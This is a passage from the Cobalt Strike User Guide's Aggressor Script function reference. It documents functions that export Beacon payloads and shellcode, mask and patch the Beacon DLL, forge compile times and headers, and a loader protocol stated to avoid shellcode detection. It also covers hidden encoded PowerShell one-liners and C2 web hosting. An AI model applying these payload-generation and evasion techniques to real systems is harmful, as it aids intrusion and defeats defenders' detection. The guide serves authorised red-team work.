AggressorScript/Functions l CobaltStrike'sBeaconhasaprotocoltoacceptartifact-providedfunctionpointersfor functionsrequiredbyBeacon'sReflectiveLoader.Theprotocolistopatchthelocationof GetProcAddressandGetModuleHandleAintotheBeaconDLL.Useofthisprotocol allowsBeacontoloaditselfinmemorywithouttriggeringshellcodedetectionheuristics thatmonitorreadsofkernel32'sExportAddressTable.Thisprotocolisoptional. Artifactsthatdon'tfollowthisprotocolwillfallbacktoresolvingkeyfunctionsviathe ExportAddressTable. l TheArtifactKitandResourceKitbothimplementthisprotocol.Downloadthesekitsto seehowtousethisfunction. Returns TheoffsettoamemorylocationtopatchwithapointerforaspecificfunctionusedbyBeacon's ReflectiveLoader. payload_local ExportsarawpayloadforaspecificCobaltStrikelistener.Usethisfunctionwhenyouplanto spawnthispayloadfromanotherBeaconsession.CobaltStrikewillgenerateapayloadthat embedskeyfunctionpointers,neededtobootstraptheagent,takenfromtheparentsession's metadata. Arguments $1-theparentBeaconsessionID $2-thelistenername $3-x86|x64thearchitectureofthepayload $4-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen done).Use'thread'ifinjectingintoanexistingprocess. $5-Astringvalueforthesystemcallmethod.Validvaluesare: None:UsethestandardWindowsAPIfunction. Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthefunction. $6-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank string). CobaltStrikeUserGuide www.fortra.com page:395
AggressorScript/Functions Returns Ascalarcontainingposition-independentcodeforthespecifiedlistener. Example $data = payload_local($bid, "my listener", "x86", "process", "None"); $handle = openf(">out.bin"); writeb($handle, $data); closef($handle); pe_insert_rich_header InsertrichheaderdataintoBeaconDLLContent.Ifthereisexistingrichheaderinformation,it willbereplaced. Arguments $1-BeaconDLLcontent $2-Richheader Returns UpdatedDLLContent Note Therichheaderlengthshouldbeona4byteboundaryforsubsequentchecksumcalculations. Example
-------------------------------------
Insert (replace) rich header
-------------------------------------
$rich_header = ""; $temp_dll = pe_insert_rich_header($temp_dll, $rich_header); pe_mask CobaltStrikeUserGuide www.fortra.com page:396
AggressorScript/Functions MaskdataintheBeaconDLLContentbasedonpositionandlength. Arguments $1-BeaconDLLcontent $2-Startlocation $3-Lengthtomask $4-Bytevaluemaskkey(int) Returns UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_mask { local('$temp_dll, $start, $length, $maskkey'); local('%pemap'); local('@loc_en, @val_en'); $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
-------------------------------------
%pemap = pedump($temp_dll); @loc_en = values(%pemap, @("Export.Name.")); @val_en = values(%pemap, @("Export.Name.")); if (size(@val_en) != 1) { warn("Unexpected size of export name value array: " . size(@val_en)); } else { warn("Current export value: " . @val_en[0]); } if (size(@loc_en) != 1) { warn("Unexpected size of export location array: " . size(@loc_en)); } else { CobaltStrikeUserGuide www.fortra.com page:397
AggressorScript/Functions warn("Current export name location: " . @loc_en[0]); }
-------------------------------------
Set parameters (parse number as base 10)
-------------------------------------
$start = parseNumber(@loc_en[0], 10); $length = 4; $maskkey = 22;
-------------------------------------
mask some data in a dll
-------------------------------------
warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
$temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
dump_my_pe($temp_dll);
-------------------------------------
un-mask (running the same mask a second time should "un-mask")
(This would normally be done by the reflective loader)
-------------------------------------
warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
$temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_mask_section MaskdataintheBeaconDLLContentbasedonpositionandlength. Arguments $1-BeaconDLLcontent $2-Sectionname $3-Bytevaluemaskkey(int) Returns CobaltStrikeUserGuide www.fortra.com page:398
AggressorScript/Functions UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_mask_section { local('$temp_dll, $section_name, $maskkey'); local('@loc_en, @val_en'); $temp_dll = $1;
-------------------------------------
Set parameters
-------------------------------------
$section_name = ".text"; $maskkey = 23;
-------------------------------------
mask a section in a dll
-------------------------------------
warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
$temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
dump_my_pe($temp_dll);
-------------------------------------
un-mask (running the same mask a second time should "un-mask")
(This would normally be done by the reflective loader)
-------------------------------------
warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
$temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_mask_string CobaltStrikeUserGuide www.fortra.com page:399
AggressorScript/Functions MaskastringintheBeaconDLLContentbasedonposition. Arguments $1-BeaconDLLcontent $2-Startlocation $3-Bytevaluemaskkey(int) Returns UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_mask_string { local('$temp_dll, $location, $length, $maskkey'); local('%pemap'); local('@loc); $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
-------------------------------------
%pemap = pedump($temp_dll); @loc = values(%pemap, @("Sections.AddressOfName.0.")); if (size(@loc) != 1) { warn("Unexpected size of section name location array: " . size(@loc)); } else { warn("Current section name location: " . @loc[0]); }
-------------------------------------
Set parameters
-------------------------------------
$location = @loc[0]; $length = 5; $maskkey = 23; CobaltStrikeUserGuide www.fortra.com page:400
AggressorScript/Functions
-------------------------------------
pe_mask_string (mask a string in a dll)
-------------------------------------
warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
$temp_dll = pe_mask_string($temp_dll, $location, $maskkey);
dump_my_pe($temp_dll);
-------------------------------------
un-mask (running the same mask a second time should "un-mask")
we are unmasking the length of the string and the null character
(This would normally be done by the reflective loader)
-------------------------------------
warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey .
")");
$temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_patch_code PatchcodeintheBeaconDLLContentbasedonfind/replacein'.text'section'. Arguments $1-BeaconDLLcontent $2-bytearraytofindforresolveoffset $3-bytearrayplaceatresolvedoffset(overwritedata) Returns UpdatedDLLContent Example CobaltStrikeUserGuide www.fortra.com page:401
AggressorScript/Functions
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_patch_code { local('$temp_dll, $findme, $replacement'); $temp_dll = $1;
====== simple text values ======
$findme = "abcABC123"; $replacement = "123ABCabc";
warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
====== byte array as a hex string ======
$findme = "\x01\x02\x03\xfc\xfe\xff"; $replacement = "\x01\x02\x03\xfc\xfe\xff";
warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_remove_rich_header RemovetherichheaderfromBeaconDLLContent. Arguments $1-BeaconDLLcontent Returns UpdatedDLLContent Example CobaltStrikeUserGuide www.fortra.com page:402
AggressorScript/Functions
-------------------------------------
Remove/Replace Rich Header
-------------------------------------
$temp_dll = pe_remove_rich_header($temp_dll); pe_set_compile_time_with_long SetthecompiletimeintheBeaconDLLContent. Arguments $1-BeaconDLLcontent $2-CompileTime(asalonginmilliseconds) Returns UpdatedDLLContent Example
date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
$date = 1893521594000; $temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
$date = 1700000001000; $temp_dll = pe_set_compile_time_with_long($temp_dll, $date); pe_set_compile_time_with_string SetthecompiletimeintheBeaconDLLContent. Arguments $1-BeaconDLLcontent $2-CompileTime(asastring) Returns UpdatedDLLContent CobaltStrikeUserGuide www.fortra.com page:403
AggressorScript/Functions Example
("01 Jan 2020 15:16:17" = "1577913377000")
$strTime = "01 Jan 2020 15:16:17"; $temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime); pe_set_export_name SettheexportnameintheBeaconDLLContent. Arguments $1-BeaconDLLcontent Returns UpdatedDLLContent Note Thenamemustexistinthestringtable. Example
-------------------------------------
name must be in strings table...
-------------------------------------
$export_name = "WININET.dll"; $temp_dll = pe_set_export_name($temp_dll, $export_name); $export_name = "beacon.dll"; $temp_dll = pe_set_export_name($temp_dll, $export_name); pe_set_long Placesalongvalueataspecifiedlocation. Arguments $1-BeaconDLLcontent CobaltStrikeUserGuide www.fortra.com page:404
AggressorScript/Functions $2-Location $3-Value Returns UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_set_long { local('$temp_dll, $int_offset, $long_value'); local('%pemap'); local('@loc_cs, @val_cs'); $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
-------------------------------------
%pemap = pedump($temp_dll); @loc_cs = values(%pemap, @("CheckSum.")); @val_cs = values(%pemap, @("CheckSum.")); if (size(@val_cs) != 1) { warn("Unexpected size of checksum value array: " . size(@val_cs)); } else { warn("Current checksum value: " . @val_cs[0]); } if (size(@loc_cs) != 1) { warn("Unexpected size of checksum location array: " . size(@loc_cs)); } else { warn("Current checksum location: " . @loc_cs[0]); }
-------------------------------------
Set parameters (parse number as base 10)
-------------------------------------
$int_offset = parseNumber(@loc_cs[0], 10); $long_value = 98765; CobaltStrikeUserGuide www.fortra.com page:405
AggressorScript/Functions
-------------------------------------
pe_set_long (set a long value)
-------------------------------------
warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
$temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);
-------------------------------------
Did it work?
-------------------------------------
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_set_short Placesashortvalueataspecifiedlocation. Arguments $1-BeaconDLLcontent $2-Location $3-Value Returns UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_set_short { local('$temp_dll, $int_offset, $short_value'); local('%pemap'); local('@loc, @val'); CobaltStrikeUserGuide www.fortra.com page:406
AggressorScript/Functions $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
-------------------------------------
%pemap = pedump($temp_dll); @loc = values(%pemap, @(".text.NumberOfRelocations.")); @val = values(%pemap, @(".text.NumberOfRelocations.")); if (size(@val) != 1) { warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val)); } else { warn("Current .text.NumberOfRelocations value: " . @val[0]); } if (size(@loc) != 1) { warn("Unexpected size of .text.NumberOfRelocations location array: " . size (@loc)); } else { warn("Current .text.NumberOfRelocations location: " . @loc[0]); }
-------------------------------------
Set parameters (parse number as base 10)
-------------------------------------
$int_offset = parseNumber(@loc[0], 10); $short_value = 128;
-------------------------------------
pe_set_short (set a short value)
-------------------------------------
warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
$temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);
-------------------------------------
Did it work?
-------------------------------------
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_set_string CobaltStrikeUserGuide www.fortra.com page:407
AggressorScript/Functions Placesastringvalueataspecifiedlocation. Arguments $1-BeaconDLLcontent $2-Startlocation $3-Value Returns UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_set_string { local('$temp_dll, $location, $value'); local('%pemap'); local('@loc_en, @val_en'); $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
-------------------------------------
%pemap = pedump($temp_dll); @loc_en = values(%pemap, @("Export.Name.")); @val_en = values(%pemap, @("Export.Name.")); if (size(@val_en) != 1) { warn("Unexpected size of export name value array: " . size(@val_en)); } else { warn("Current export value: " . @val_en[0]); } if (size(@loc_en) != 1) { warn("Unexpected size of export location array: " . size(@loc_en)); } else { warn("Current export name location: " . @loc_en[0]); } CobaltStrikeUserGuide www.fortra.com page:408
AggressorScript/Functions
-------------------------------------
Set parameters (parse number as base 10)
-------------------------------------
$location = parseNumber(@loc_en[0], 10); $value = "BEECON.DLL";
-------------------------------------
pe_set_string (set a string value)
-------------------------------------
warn("pe_set_string(dll, " . $location . ", " . $value . ")");
$temp_dll = pe_set_string($temp_dll, $location, $value);
-------------------------------------
Did it work?
-------------------------------------
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_set_stringz Placesastringvalueataspecifiedlocationandaddsazeroterminator. Arguments $1-BeaconDLLcontent $2-Startlocation $3-Stringtoset Returns UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
CobaltStrikeUserGuide www.fortra.com page:409
AggressorScript/Functions
===========================================================================
sub demo_pe_set_stringz { local('$temp_dll, $offset, $value'); local('%pemap'); local('@loc'); $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
-------------------------------------
%pemap = pedump($temp_dll); @loc = values(%pemap, @("Sections.AddressOfName.0.")); if (size(@loc) != 1) { warn("Unexpected size of section name location array: " . size(@loc)); } else { warn("Current section name location: " . @loc[0]); }
-------------------------------------
Set parameters (parse number as base 10)
-------------------------------------
$offset = parseNumber(@loc[0], 10); $value = "abc";
-------------------------------------
pe_set_stringz
-------------------------------------
warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
$temp_dll = pe_set_stringz($temp_dll, $offset, $value);
-------------------------------------
Did it work?
-------------------------------------
dump_my_pe($temp_dll);
-------------------------------------
Set parameters
-------------------------------------
$offset = parseNumber(@loc[0], 10);
$value = ".tex";
-------------------------------------
pe_set_string (set a string value)
-------------------------------------
warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
CobaltStrikeUserGuide www.fortra.com page:410
AggressorScript/Functions
$temp_dll = pe_set_string($temp_dll, $offset, $value);
-------------------------------------
Did it work?
-------------------------------------
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_set_value_at SetsalongvaluebasedonthelocationresolvedbyanamefromthePEMap(seepedump). Arguments $1-BeaconDLLcontent $2-Nameoflocationfield $3-Value Returns UpdatedDLLContent Example
===========================================================================
$1 = DLL content
===========================================================================
sub demo_pe_set_value_at { local('$temp_dll, $name, $long_value, $date'); local('%pemap'); local('@loc, @val'); $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
CobaltStrikeUserGuide www.fortra.com page:411
AggressorScript/Functions
-------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @("SizeOfImage."));
@val = values(%pemap, @("SizeOfImage."));
if (size(@val) != 1) {
warn("Unexpected size of SizeOfImage. value array: " . size(@val));
} else {
warn("Current SizeOfImage. value: " . @val[0]);
}
if (size(@loc) != 1) {
warn("Unexpected size of SizeOfImage location array: " . size(@loc));
} else {
warn("Current SizeOfImage. location: " . @loc[0]);
}
-------------------------------------
Set parameters
-------------------------------------
$name = "SizeOfImage"; $long_value = 22334455;
-------------------------------------
pe_set_value_at (set a long value at the location resolved by name)
-------------------------------------
$1 = DLL (byte array)
$2 = name (string)
$3 = value (long)
-------------------------------------
warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")"); $temp_dll = pe_set_value_at($temp_dll, $name, $long_value);
-------------------------------------
Did it work?
-------------------------------------
dump_my_pe($temp_dll);
-------------------------------------
set it back?
-------------------------------------
warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
$temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
CobaltStrikeUserGuide www.fortra.com page:412
AggressorScript/Functions
-------------------------------------
return $temp_dll; } pe_stomp Setastringtonullcharacters.Startataspecifiedlocationandsetsallcharacterstonulluntila nullstringterminatorisreached. Arguments $1-BeaconDLLcontent $2-Startlocation Returns UpdatedDLLContent Example
===========================================================================
$1 = Beacon DLL content
===========================================================================
sub demo_pe_stomp { local('$temp_dll, $offset, $value, $old_name'); local('%pemap'); local('@loc, @val'); $temp_dll = $1;
-------------------------------------
Inspect the current DLL...
-------------------------------------
%pemap = pedump($temp_dll); @loc = values(%pemap, @("Sections.AddressOfName.1.")); @val = values(%pemap, @("Sections.AddressOfName.1.")); if (size(@val) != 1) { warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val)); } else { warn("Current Sections.AddressOfName.1 value: " . @val[0]); } CobaltStrikeUserGuide www.fortra.com page:413
AggressorScript/Functions if (size(@loc) != 1) { warn("Unexpected size of Sections.AddressOfName.1 location array: " . size (@loc)); } else { warn("Current Sections.AddressOfName.1 location: " . @loc[0]); }
-------------------------------------
Set parameters (parse number as base 10)
-------------------------------------
$location = parseNumber(@loc[0], 10);
-------------------------------------
pe_stomp (stomp a string at a location)
-------------------------------------
warn("pe_stomp(dll, " . $location . ")");
$temp_dll = pe_stomp($temp_dll, $location);
-------------------------------------
Did it work?
-------------------------------------
dump_my_pe($temp_dll);
-------------------------------------
All Done! Give back edited DLL!
-------------------------------------
return $temp_dll; } pe_update_checksum UpdatethechecksumintheBeaconDLLContent. Arguments $1-BeaconDLLcontent Returns UpdatedDLLContent Note Thisshouldbethelasttransformationperformed. CobaltStrikeUserGuide www.fortra.com page:414
AggressorScript/Functions Example
-------------------------------------
update checksum
-------------------------------------
$temp_dll = pe_update_checksum($temp_dll); pedump ParseanexecutableBeaconintoamapofthePEHeaderinformation.Theparsedinformation canbeusedforresearchorprogrammaticallytomakechangestotheBeacon. Arguments $1-BeaconDLLcontent Returns Amapoftheparsedinformation.Themapdataisverysimilartothe"./peclonedump[file]" commandoutput. Example
===========================================================================
'case insensitive sort' from sleep manual...
===========================================================================
sub caseInsensitiveCompare { $a = lc($1); $b = lc($2); return $a cmp $b; }
===========================================================================
Dump PE Information
$1 = Beacon DLL content
===========================================================================
sub dump_my_pe { local('$out $key $val %pemap @sorted_keys'); %pemap = pedump($1);
---------------------------------------------------
CobaltStrikeUserGuide www.fortra.com page:415
AggressorScript/Functions
Example listing all items from hash/map...
---------------------------------------------------
@sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap)); foreach $key (@sorted_keys) { $out = "$[50]key"; foreach $val (values(%pemap, @($key))) { $out .= " $val"; println($out); } }
---------------------------------------------------
Example of grabbing specific items from hash/map...
---------------------------------------------------
local('@loc_cs @val_cs'); @loc_cs = values(%pemap, @("CheckSum.")); @val_cs = values(%pemap, @("CheckSum.")); println(""); println("My DLL CheckSum Location: " . @loc_cs); println("My DLL CheckSum Value: " . @val_cs); println(""); } Seealso ./peclonedump[file] pgraph GeneratethepivotgraphGUIcomponent. Returns ThepivotgraphGUIobject(ajavax.swing.JComponent) Example addVisualization("Pivot Graph", pgraph()); Seealso CobaltStrikeUserGuide www.fortra.com page:416
AggressorScript/Functions &showVisualization pivots ReturnsalistofSOCKSpivotsfromCobaltStrike'sdatamodel. Returns Anarrayofdictionaryobjectswithinformationabouteachpivot. Example printAll(pivots()); popup_clear Removeallpopupmenusassociatedwiththecurrentmenu.ThisisawaytooverrideCobalt Strike'sdefaultpopupmenudefinitions. Arguments $1-thepopuphooktoclearregisteredmenusfor Example popup_clear("help"); popup help { item "My stuff!" { show_message("This is my menu!"); } } powershell DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead. ReturnsaPowerShellone-linertobootstrapthespecifiedlistener. Arguments CobaltStrikeUserGuide www.fortra.com page:417
AggressorScript/Functions $1-thelistenername $2-[true/false]:isthislistenertargetinglocalhost? $3-x86|x64-thearchitectureofthegeneratedstager. Notes Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86. Returns APowerShellone-linertorunthespecifiedlistener. Example println(powershell("my listener", false)); powershell_command Returnsaone-linertorunaPowerShellexpression(e.g.,powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==) Arguments $1-thePowerShellexpressiontowrapintoaone-liner. $2-willthePowerShellcommandrunonaremotetarget? Returns Returnsapowershell.exeone-linertorunthespecifiedexpression. Example $cmd = powershell_command("2 + 2", false); println($cmd); powershell_compress CompressesaPowerShellscriptandwrapsitinascripttodecompressandexecuteit. CobaltStrikeUserGuide www.fortra.com page:418
AggressorScript/Functions Arguments $1-thePowerShellscripttocompress. Example $script = powershell_compress("2 + 2"); powershell_encode_oneliner DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command instead. Returnsaone-linertorunaPowerShellexpression(e.g.,powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==) Arguments $1-thePowerShellexpressiontowrapintoaone-liner. Returnsapowershell.exeone-linertorunthespecifiedexpression. Example $cmd = powershell_encode_oneliner("2 + 2"); println($cmd); powershell_encode_stager DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and &powershell_command instead. Returnsabase64encodedPowerShellscripttorunthespecifiedshellcode Arguments $1-shellcodetowrap Returns Returnsabase64encodedPowerShellsuitableforusewithpowershell.exe's-encoption. CobaltStrikeUserGuide www.fortra.com page:419
AggressorScript/Functions Example $shellcode = shellcode("my listener", false); $readytouse = powershell_encode_stager($shellcode); println("powershell.exe -ep bypass -enc $readytouse"); pref_get GrabsastringvaluefromCobaltStrike'spreferences. Arguments $1-thepreferencename $2-thedefaultvalue[ifthereisnovalueforthispreference] Returns Astringwiththepreferencevalue. Example $foo = pref_get("foo.string", "bar"); pref_get_list GrabsalistvaluefromCobaltStrike'spreferences. Arguments $1-thepreferencename Returns Anarraywiththepreferencevalues Example @foo = pref_get_list("foo.list"); CobaltStrikeUserGuide www.fortra.com page:420
AggressorScript/Functions pref_set SetavalueinCobaltStrike'spreferences Arguments $1-thepreferencename $2-thepreferencevalue Example pref_set("foo.string", "baz!"); pref_set_list StoresalistvalueintoCobaltStrike'spreferences. Arguments $1-thepreferencename $2-anarrayofvaluesforthispreference Example pref_set_list("foo.list", @("a", "b", "c")); previousTab Activatethetabthatistotheleftofthecurrenttab. Example bind Ctrl+Left { previousTab(); } process_browser CobaltStrikeUserGuide www.fortra.com page:421
AggressorScript/Functions OpenstheProcessBrowser.Thisfunctiondoesnothaveanyparameters. privmsg Postaprivatemessagetoauserintheeventlog Arguments $1-whotosendthemessageto $2-themessage Example privmsg("raffi", "what's up man?"); prompt_confirm ShowadialogwithYes/Nobuttons.Iftheuserpressesyes,callthespecifiedfunction. Arguments $1-textinthedialog $2-titleofthedialog $3-acallbackfunction.Calledwhentheuserpressesyes. Example prompt_confirm("Do you feel lucky?", "Do you?", { show_mesage("Ok, I got nothing"); }); prompt_directory_open Showadirectoryopendialog. Arguments CobaltStrikeUserGuide www.fortra.com page:422
AggressorScript/Functions $1-titleofthedialog $2-defaultvalue $3-true/false:allowusertoselectmultiplefolders? $4-acallbackfunction.Calledwhentheuserchoosesafolder.Theargumenttothecallbackis theselectedfolder.Ifmultiplefoldersareselected,theywillstillbespecifiedasthefirst argument,separatedbycommas. Example prompt_directory_open("Choose a folder", $null, false, { show_message("You chose: $1"); }); prompt_file_open Showafileopendialog. Arguments $1-titleofthedialog $2-defaultvalue $3-true/false:allowusertoselectmultiplefiles? $4-acallbackfunction.Calledwhentheuserchoosesafiletoopen.Theargumenttothe callbackistheselectedfile.Ifmultiplefilesareselected,theywillstillbespecifiedasthefirst argument,separatedbycommas. Example prompt_file_open("Choose a file", $null, false, { show_message("You chose: $1"); }); prompt_file_save Showafilesavedialog. CobaltStrikeUserGuide www.fortra.com page:423
AggressorScript/Functions Arguments $1-defaultvalue $2-acallbackfunction.Calledwhentheuserchoosesafilename.Theargumenttothecallback isthedesiredfile. Example prompt_file_save($null, { local('$handle'); $handle = openf("> $+ $1"); println($handle, "I am content"); closef($handle); }); prompt_text Showadialogthataskstheuserfortext. Arguments $1-textinthedialog $2-defaultvalueinthetextfield. $3-acallbackfunction.CalledwhentheuserpressesOK.Thefirstargumenttothiscallbackis thetexttheuserprovided. Example prompt_text("What is your name?", "Cyber Bob", { show_mesage("Hi $1 $+ , nice to meet you!"); }); range Generateanarrayofnumbersbasedonastringdescriptionofranges. Arguments CobaltStrikeUserGuide www.fortra.com page:424
AggressorScript/Functions $1-astringwithadescriptionofranges Range Result 103 Thenumber103 3-8 Thenumbers3,4,5,6,and7. 2,4-6 Thenumbers2,4,and5. Returns Anarrayofnumberswithinthespecifiedranges. Example printAll(range("2,4-6")); redactobject Removesapost-exploitationobject(e.g.,screenshot,keystrokebuffer)fromtheuserinterface. Arguments $1-theIDofthepost-exploitationobject. removeTab Closetheactivetab Example bind Ctrl+D { removeTab(); } resetData ResetCobaltStrike'sdatamodel. say CobaltStrikeUserGuide www.fortra.com page:425
AggressorScript/Functions Postapublicchatmessagetotheeventlog. Arguments $1-themessage Example say("Hello World!"); sbrowser GeneratethesessionbrowserGUIcomponent.ShowsBeaconANDSSHsessions. Returns ThesessionbrowserGUIobject(ajavax.swing.JComponent) Example addVisualization("Session Browser", sbrowser()); Seealso &showVisualization screenshots ReturnsalistofscreenshotsfromCobaltStrike'sdatamodel. Returns Anarrayofdictionaryobjectswithinformationabouteachscreenshot. Example printAll(screenshots()); script_resource CobaltStrikeUserGuide www.fortra.com page:426
AggressorScript/Functions Returnsthefullpathtoaresourcethatisstoredrelativetothisscriptfile. Arguments $1-thefiletogetapathfor Returns Thefullpathtothespecifiedfile. Example println(script_resource("dummy.txt")); separator Insertaseparatorintothecurrentmenutree. Example popup foo { item "Stuff" { ... } separator(); item "Other Stuff" { ... } } services ReturnsalistofservicesinCobaltStrike'sdatamodel. Returns Anarrayofdictionaryobjectswithinformationabouteachservice. Example printAll(services()); setup_reflective_loader CobaltStrikeUserGuide www.fortra.com page:427
AggressorScript/Functions Insertthereflectiveloaderexecutablecodeintoabeaconpayload. Arguments $1-Originalbeaconexecutablepayload. $2-UserdefinedReflectiveLoaderexecutabledata. Returns Thebeaconexecutablepayloadupdatedwiththeuserdefinedreflectiveloader.$nullifthereis anerror. Notes TheuserdefinedReflectiveLoadermustbelessthan5k. Example SeeBEACON_RDLL_GENERATEhook
---------------------------------------------------------------------
Replace the beacons default loader with '$loader'.
---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader); setup_strings ApplythestringsdefinedintheMalleableC2profiletothebeaconpayload. Arguments $1–beaconpayloadtomodify Returns Theupdatedbeaconpayloadwiththedefinedstringsappliedtothepayload. Example SeeBEACON_RDLL_GENERATEhook CobaltStrikeUserGuide www.fortra.com page:428
AggressorScript/Functions
Apply strings to the beacon payload.
$temp_dll = setup_strings($temp_dll); setup_transformations ApplythetransformationsrulesdefinedintheMalleableC2profiletothebeaconpayload. Arguments $1–Beaconpayloadtomodify $2–Beaconarchitecture(x86/x64) Returns Theupdatedbeaconpayloadwiththetransformationsappliedtothepayload. Example SeeBEACON_RDLL_GENERATEhook
Apply the transformations to the beacon payload.
$temp_dll = setup_transformations($temp_dll, $arch); shellcode DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead. ReturnsrawshellcodeforaspecificCobaltStrikelistener Arguments $1-thelistenername $2-true/false:isthisshellcodedestinedforaremotetarget? $3-x86|x64-thearchitectureofthestageroutput. Note Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86. CobaltStrikeUserGuide www.fortra.com page:429
AggressorScript/Functions Returns Ascalarcontainingshellcodeforthespecifiedlistener. Example $data = shellcode("my listener", false, "x86"); $handle = openf(">out.bin"); writeb($handle, $data); closef($handle); showVisualization SwitchCobaltStrikevisualizationtoaregisteredvisualization. Arguments $1-thenameofthevisualization Example bind Ctrl+H { showVisualization("Hello World"); } Seealso &showVisualization show_error Showsanerrormessagetotheuserinadialogbox.Usethisfunctiontorelayerrorinformation. Arguments $1-themessagetext Example CobaltStrikeUserGuide www.fortra.com page:430
AggressorScript/Functions show_error("You did something bad."); show_message Showsamessagetotheuserinadialogbox.Usethisfunctiontorelayinformation. Arguments $1-themessagetext Example show_message("You've won a free ringtone"); site_host HostcontentonCobaltStrike'swebserver Arguments $1-thehostforthissite(&localipisagooddefault) $2-theport(e.g.,80) $3-theURI(e.g.,/foo) $4-thecontenttohost(asastring) $5-themime-type(e.g.,"text/plain") $6-adescriptionofthecontent.ShowninSite Management -> Manage. $7-useSSLornot(trueorfalse) Returns TheURLtothishostedsite Example site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false); CobaltStrikeUserGuide www.fortra.com page:431
AggressorScript/Functions site_kill RemoveasitefromCobaltStrike'swebserver Arguments $1-theport $2-theURI Example
removes the content bound to / on port 80
site_kill(80, "/"); sites ReturnsalistofsitestiedtoCobaltStrike'swebserver. Returns Anarrayofdictionaryobjectswithinformationabouteachregisteredsite. Example printAll(sites()); ssh_command_describe DescribeanSSHcommand. Returns AstringdescriptionoftheSSHcommand. Arguments $1-thecommand Example CobaltStrikeUserGuide www.fortra.com page:432
AggressorScript/Functions println(ssh_command_describe("sudo")); ssh_command_detail GetthehelpinformationforanSSHcommand. Returns AstringwithhelpfulinformationaboutanSSHcommand. Arguments $1-thecommand Example println(ssh_command_detail("sudo")); ssh_command_register RegisterhelpinformationforanSSHconsolecommand. Arguments $1-thecommand $2-theshortdescriptionofthecommand $3-thelong-formhelpforthecommand. Example ssh_alias echo { blog($1, "You typed: " . substr($1, 5)); } ssh_command_register( "echo", "echo posts to the current session's log", "Synopsis: echo [arguments]\n\nLog arguments to the SSH console"); CobaltStrikeUserGuide www.fortra.com page:433
